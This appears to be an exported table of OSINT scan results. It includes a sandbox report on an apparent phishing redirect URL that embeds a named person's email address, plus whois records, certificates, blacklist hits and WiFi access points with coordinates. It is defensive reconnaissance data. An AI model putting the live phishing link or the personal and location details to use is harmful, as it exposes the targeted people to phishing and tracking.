| 2023-05-12 02:53:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 29, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-22', u'name': u'Fails to load modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1574/002', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-641', u'attck_id': u'T1574.002', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" failed to load missing module "MDMRegistration.dll" - [base:0; Status:c000000d]\n "msedge.exe" failed to load missing module "netapi32.dll" - [base:0; Status:c000000d]'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7008:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7008:120:WilError_01"\n "SM0:6264:120:WilError_01"\n "Local\\SM0:6264:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:6264:120:WilError_01"\n "Local\\SM0:7008:120:WilError_01"\n "SM0:7008:304:WilStaging_02"\n "Local\\SM0:7008:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7008:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7008:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': 
u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.40.106:443"\n "102.37.125.193:443"\n "35.186.254.174:443"\n "142.250.191.68:443"\n "104.18.11.207:443"\n "104.26.9.175:443"\n "142.250.189.195:443"\n "172.217.12.99:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"1000logos.net"\n "api.salesflare.com"\n "fonts.gstatic.com"\n "llink.to"\n "stackpath.bootstrapcdn.com"\n "tamannigeria.org"\n "track.salesflare.com"\n "www.gstatic.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-203', u'name': u'Tries to access LNK files (Windows shortcut)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 3, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\MICROSOFT EDGE.LNK"\n "msedge.exe" trying to 
access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\File Explorer.lnk"\n "msedge.exe" trying to access LNK file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Microsoft Edge.lnk"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\shopping.js]- [targetUID: 00000000-00007008]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_2]- [targetUID: 00000000-00007008]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir7008_561964248\\Ruleset Data]- [targetUID: 00000000-00007008]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Edge Shopping\\2.0.2353.0\\edge_driver.js]- [targetUID: 00000000-00007008]\n "Filtering Rules" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.45\\Filtering Rules]- [targetUID: 00000000-00007008]\n "data_1" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\DawnCache\\data_1]- [targetUID: 00000000-00007008]\n "edge_confirmation_page_validator.js" has type "UTF-8 Unicode 
text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00007008]\n "product_page.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\product_page.js]- [targetUID: 00000000-00007008]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\edge_checkout_page_validator.js]- [targetUID: 00000000-00007008]\n "auto_open_controller.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\auto_open_controller.js]- [targetUID: 00000000-00007008]\n "000009.log" has type "data"- [targetUID: N/A]\n "000013.ldb" has type "data"- [targetUID: N/A]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\7008_877128101\\Filtering Rules-AA]- [targetUID: 00000000-00007008]\n "000014.ldb" has type "data"- [targetUID: N/A]\n "load_statistics.db" has type "SQLite 3.x database last written using SQLite version 3039003"- [targetUID: N/A]\n "shoppingfre.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\7008_1698674626\\shoppingfre.js]- [targetUID: 00000000-00007008]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007008]\n "327850598c96cdd5_0" has type "data"- [targetUID: N/A]'}, {u'category': u'Environment Awareness', u'origin': u'File/Memory', u'identifier': u'string-253', u'name': u'Contains ability to detect presence of virtual environment (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1497', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1497', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string 
"SetupDiGetClassDevsW" (Indicator: "SetupDiGetClassDevs"; Source: "00000000-00007008-00000C1E-47697825")'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com"\n Pattern match: "https://llink.to"\n Heuristic match: "1000logos.net"\n Heuristic match: "api.salesflare.com"\n Heuristic match: "fonts.gstatic.com"\n Heuristic match: "llink.to"\n Heuristic match: "stackpath.bootstrapcdn.com"\n Heuristic match: "tamannigeria.org"\n Heuristic match: "track.salesflare.com"\n Pattern match: "www.gstatic.com"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "Math.PI/180"\n Pattern match: "https://reactjs.org/docs/error-decoder.html?invariant=+e,n=1;n"\n Pattern match: "http://www.w3.org/2000/svg\\n"\n Pattern match: "https://github.com/microsoft/fast/issues/5848\\n"\n Pattern match: "www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://track.salesflare.com/flare.js"\n Pattern match: "https://tamannigeria.org/NUNEZ/site.php"\n Heuristic match: "tamanrigeria.org"\n Heuristic match: "u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com"\n Pattern match: "llink.to/?u=https%3A%2F%2Ftamannigeria.org%2FNUNEZ%2Fascensia.com%2Ffelicia.xu%40ascensia.com"\n Heuristic match: "a.com"\n Heuristic match: "link.to"\n Heuristic match: "m%2Ffelicia.xu%40ascensia.com"\n Heuristic match: "0ascensia.com"\n Pattern match: 
"http://schemas.microsoft.com/SMI/2005/WindowsSettings"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-40', u'name': u'Drops script (vb/js) files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 1, u'typ | 185.199.109.153 |
| 2023-05-12 03:13:02 | Malicious Affiliate IP Address | Yes | Threat Jammer | 0 | 1 | 3 | 0 | None | Threat Jammer - Risk score: 40 (MEDIUM)
https://threatjammer.com/info/87.248.157.93 | 87.248.157.93 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=6ZH4%2BS7iwGiB1Wu7l%2FAB03y2sKXJwRGFC2pyd%2BZjS4ZmLlnY7XMvuoX5GBTxa3DM3NheNEVhPebnH7oSWouKWRGMXi2e4r7tA5Bf491iZPTiDiZco8VmKugKJA%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5a3bb81a1b-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.29): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:27:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.128:80 | 188.114.96.0/24 |
| 2023-05-12 02:53:35 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["22DC:47A8:9574C0:E80210:645D792E"], "Content_Type": ["text/html; charset=utf-8"], "Age": ["0"], "Vary": ["Accept-Encoding"], "Server": ["GitHub.com"], "X_Cache": ["MISS"], "X_Timer": ["S1683847470.229374,VS0,VE28"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["ae50aba31a182a84ec5561a841cace6a8bdb972f"], "X_Cache_Hits": ["0"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "X_Served_By": ["cache-chi-klot8100109-CHI"], "Accept_Ranges": ["bytes"]} | 185.199.110.153 |
| 2023-05-12 02:53:49 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8000::/48 | 2606:50c0:8000::153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | la_vieve (Net ID: 00:06:25:7B:45:13) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:24:21 | HTTP Status Code | No | Web Spider | 0 | 0 | 4 | 0 | None | 403 | https://ayhu.xyz/lol.html?__cf_chl_f_tk=s7qF6ZO3cVvdEEZa_WmCMPM6sxOwT7Q8EvJA4xw7FTE-1683861861-0-gaNycGzNChA |
| 2023-05-12 03:09:28 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 0 | 2 | 0 | None | acilacikveteriner.com | 87.248.157.102 |
| 2023-05-12 03:35:25 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [45.131.109.0/24]
http://www.voipbl.org/update | 45.131.109.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan39 (Net ID: 00:02:6F:08:21:FC) | 37.7642, -122.3993 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | giters (Category: coding)
https://giters.com/patrickpogoda | patrickpogoda |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-0582 (Net ID: 00:1D:D4:13:05:80) | 32.8608, -79.9746 |
| 2023-05-12 03:17:38 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: AYHA.XYZ
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2022-04-30T16:37:38.0Z
Creation Date: 2022-04-25T16:34:12.0Z
Registry Expiry Date: 2024-04-25T23:59:59.0Z
Registrar: GMO Internet Group, Inc. d/b/a Onamae.com
Registrar IANA ID: 49
Domain Status: ok https://icann.org/epp#ok
Domain Status: autoRenewPeriod https://icann.org/epp#autoRenewPeriod
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant State/Province: Tokyo
Registrant Country: JP
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1.GM111.PARKLOGIC.COM
Name Server: NS2.GM111.PARKLOGIC.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:17:37.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayha.xyz
Registry Domain ID: D293590239-CNIC
Registrar WHOIS Server: whois.discount-domain.com
Registrar URL: http://www.onamae.com
Updated Date: 2023-04-26T06:12:30Z
Creation Date: 2022-04-25T16:34:14Z
Registrar Registration Expiration Date: 2023-04-25T23:59:59Z
Registrar: GMO INTERNET, INC.
Registrar IANA ID: 49
Registrar Abuse Contact Email: abuse@gmo.jp
Registrar Abuse Contact Phone: +81.337709199
Domain Status: ok https://icann.org/epp#ok
Registry Registrant ID: E4D57C1767DC8C
Registrant Name: Whois Privacy Protection Service by onamae.com
Registrant Organization: Whois Privacy Protection Service by onamae.com
Registrant Street: 26-1 Sakuragaoka-cho
Registrant Street: Cerulean Tower 11F
Registrant City: Shibuya-ku
Registrant State/Province: Tokyo
Registrant Postal Code: 150-8512
Registrant Country: JP
Registrant Phone: +81.354562560
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: proxy@whoisprotectservice.com
Registry Admin ID: E4D57C3C00BE9C
Admin Name: Whois Privacy Protection Service by onamae.com
Admin Organization: Whois Privacy Protection Service by onamae.com
Admin Street: 26-1 Sakuragaoka-cho
Admin Street: Cerulean Tower 11F
Admin City: Shibuya-ku
Admin State/Province: Tokyo
Admin Postal Code: 150-8512
Admin Country: JP
Admin Phone: +81.354562560
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: proxy@whoisprotectservice.com
Registry Tech ID: E4D27D6C252D99
Tech Name: Whois Privacy Protection Service by onamae.com
Tech Organization: Whois Privacy Protection Service by onamae.com
Tech Street: 26-1 Sakuragaoka-cho
Tech Street: Cerulean Tower 11F
Tech City: Shibuya-ku
Tech State/Province: Tokyo
Tech Postal Code: 150-8512
Tech Country: JP
Tech Phone: +81.354562560
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: proxy@whoisprotectservice.com
Name Server: ns1.gm111.parklogic.com
Name Server: ns2.gm111.parklogic.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-04-26T06:12:30Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | ayha.xyz |
| 2023-05-12 02:55:18 | Physical Location | No | Censys | 0 | 0 | 3 | 0 | None | Frankfurt am Main, Hesse, 60306, Germany, Europe | 46.101.229.70 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 008security.github.io | 185.199.111.153 |
| 2023-05-12 02:46:50 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | 34.74.170.74 |
| 2023-05-12 02:53:08 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:78:81:e1:ef:49:4b:f9:6d:c5:16:34:0e:55:ab:d5:12:44
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 09:44:02 2022 GMT
Not After : Feb 15 09:44:01 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c5:28:ae:be:17:84:18:1b:e1:bf:c2:45:52:c1:
a5:6a:08:4a:bc:c1:e3:a4:de:5e:d0:05:9f:d6:99:
22:94:16:f7:d2:69:68:71:09:4a:62:e7:41:0d:0a:
be:3e:3b:51:6d:0b:4a:0f:76:3a:b0:8e:cb:56:a6:
21:8f:de:9f:c1:45:ea:d1:38:90:03:24:5c:77:6f:
cd:06:86:05:00:ae:fc:49:fe:8f:e8:85:de:e7:e4:
d0:99:c5:ad:e4:c5:9c:9a:95:9e:97:20:79:ed:7e:
c1:65:47:a7:ce:2c:b4:2b:9e:4c:1f:8e:21:8f:4e:
cf:f7:3e:4f:ff:b2:88:aa:90:dd:b7:be:8a:db:d2:
17:66:cc:6f:09:3d:67:e8:3c:91:39:a6:90:69:62:
e9:f2:9c:b4:d3:ba:96:0b:b2:0e:b2:74:eb:8a:64:
f6:d7:18:6c:22:f7:1e:bc:17:2f:20:0c:dc:30:1b:
5e:7d:a8:0b:34:ce:8a:75:55:4f:72:8b:d6:d7:dc:
63:55:19:dd:2a:a0:25:0a:50:bd:17:df:74:d9:8e:
df:7b:ba:19:b8:f5:47:fd:97:bf:18:2b:99:ec:f3:
58:72:eb:64:34:43:28:b7:d3:7f:de:05:80:58:fb:
f6:05:86:02:1c:8d:eb:d5:23:a1:08:9a:01:84:aa:
05:5a:57:5b:4f:80:96:8a:65:18:8f:fb:bb:dd:91:
f1:8e:b1:05:2f:76:93:8f:28:86:73:78:5c:d4:fe:
b8:81:83:79:71:79:e9:31:46:fb:22:a9:30:c3:0b:
03:79:d0:e6:24:cf:e4:e0:cb:3e:91:71:20:ec:40:
44:0f:22:88:b4:5a:5f:cd:f2:41:b7:a9:21:3e:74:
54:3b:a0:07:32:4e:5c:e7:71:a3:33:95:bd:ee:27:
4a:b2:53:d1:06:de:2c:39:7b:83:7f:1c:cf:0a:28:
32:ef:07:d4:d3:ef:a5:9d:8a:8a:36:97:d5:6f:97:
57:8e:aa:22:4e:6c:70:6c:aa:43:59:1c:d0:88:a6:
26:22:1b:20:62:45:6e:6e:62:40:f6:bf:20:b1:b8:
43:17:25:80:1d:c9:c1:63:ed:d3:a8:bc:4b:68:5d:
f2:19:96:37:4a:82:70:a9:86:22:f6:56:84:02:f9:
b4:a7:6c:3d:03:4c:59:fe:71:81:0a:71:7e:9e:7c:
1a:5d:b6:ce:77:db:f9:80:a5:2d:65:a3:96:1f:c9:
ca:a0:c7:b0:9d:21:28:db:1c:6a:4c:c7:37:20:39:
9f:b7:63:e2:80:c5:2d:53:fd:3e:c8:1a:cf:e7:76:
9f:bc:92:4a:58:81:84:d1:30:a4:4e:12:c7:e5:10:
eb:dc:59
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
75:02:8B:49:76:96:40:2E:6F:D7:49:80:B9:AF:AD:08:D3:5D:F2:26
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
29:76:7a:56:81:b0:95:01:3f:0a:9d:7d:c4:e5:17:5f:14:64:
31:1f:ff:e8:89:b7:73:d0:e5:48:95:94:90:79:71:5f:5e:bd:
11:57:2e:35:46:0a:d0:46:0d:68:f1:c5:7a:ea:d2:5c:76:4c:
32:7a:df:e5:15:1f:4c:85:80:9e:03:4d:56:80:ad:4b:2c:6b:
b1:00:96:20:ff:02:5c:fe:b3:6b:a4:df:10:d7:1a:34:e6:05:
8a:93:ce:43:93:43:f0:21:83:34:dd:3b:5d:cd:02:a2:f7:69:
01:e6:a2:9d:c4:0a:00:06:c9:25:8d:66:34:7e:e7:56:fc:96:
0c:11:f2:15:8e:1b:ee:a8:bc:70:25:91:eb:fa:be:46:78:f9:
43:e5:48:f9:88:3a:38:53:b4:c2:e1:83:7c:30:6a:d7:b6:1a:
08:51:7a:03:5c:ed:3d:25:45:1e:03:b4:ab:40:92:83:1a:fd:
41:7d:5f:d2:40:54:63:0d:0f:36:db:fd:2f:13:eb:5b:2e:6b:
08:c3:7d:13:ce:a1:6a:1d:ba:e8:54:c7:19:87:ff:c8:d8:2e:
77:d7:9f:17:34:29:b1:63:1a:a3:70:9f:2d:0d:32:ff:45:66:
9c:81:e8:0c:a2:cc:74:6a:75:0f:61:f4:74:74:89:88:86:e3:
ba:d0:68:2d
| battleb0t.xyz |
| 2023-05-12 03:23:31 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.11:8080 | 188.114.96.0/24 |
| 2023-05-12 03:00:50 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.72): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.115 | 35.229.48.116 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.175): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | 3dtoday (Category: hobby)
https://3dtoday.ru/blogs/login | login |
| 2023-05-12 02:55:18 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | linux | 46.101.229.70 |
| 2023-05-12 03:03:16 | IP Address | No | DNS Resolver | 0 | 0 | 2 | 0 | None | 172.67.168.252 | panel.battleb0t.xyz |
| 2023-05-12 03:31:58 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.0:80 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Newgrounds (Category: gaming)
https://login.newgrounds.com/ | login |
| 2023-05-12 03:12:58 | Malicious Affiliate | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [frabjous-lebkuchen-324004.netlify.app]
https://www.openphish.com/feed.txt | frabjous-lebkuchen-324004.netlify.app |
| 2023-05-12 02:46:42 | Physical Location | No | Fraudguard | 0 | 0 | 3 | 0 | None | United States, South Carolina, North Charleston | 35.229.48.116 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:09:26 | Co-Hosted Site - Domain Whois | No | Whois | 1 | 0 | 4 | 0 | None | % Hello, this is the DOMREG whois service.
%
% By submitting a query you agree not to use the information made
% available to:
% - allow, enable or otherwise support the transmission of unsolicited,
% commercial advertising or other solicitations whether via email or
% otherwise;
% - target advertising in any possible way;
% - to cause nuisance in any possible way to the registrants by sending
% (whether by automated, electronic processes capable of enabling
% high volumes or other possible means) messages to them.
%
% Version 0.4
%
% For more information please visit https://whois.lt
%
Domain: 000.lt
Status: registered
Registered: 2022-10-11
Expires: 2023-10-12
%
Registrar: Telia Lietuva, AB
Registrar website: http://www.hostex.lt
Registrar email: domains@hostex.lt
%
Contact organization: Telia Lietuva, AB
Contact email: domains@hostex.lt
%
Nameserver: ns3.hostex.lt
Nameserver: ns4.hostex.lt
Nameserver: ns1.hostex.lt
Nameserver: ns2.hostex.lt
| 000.lt |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | au.ru (Category: misc)
https://au.ru/user/login/ | login |
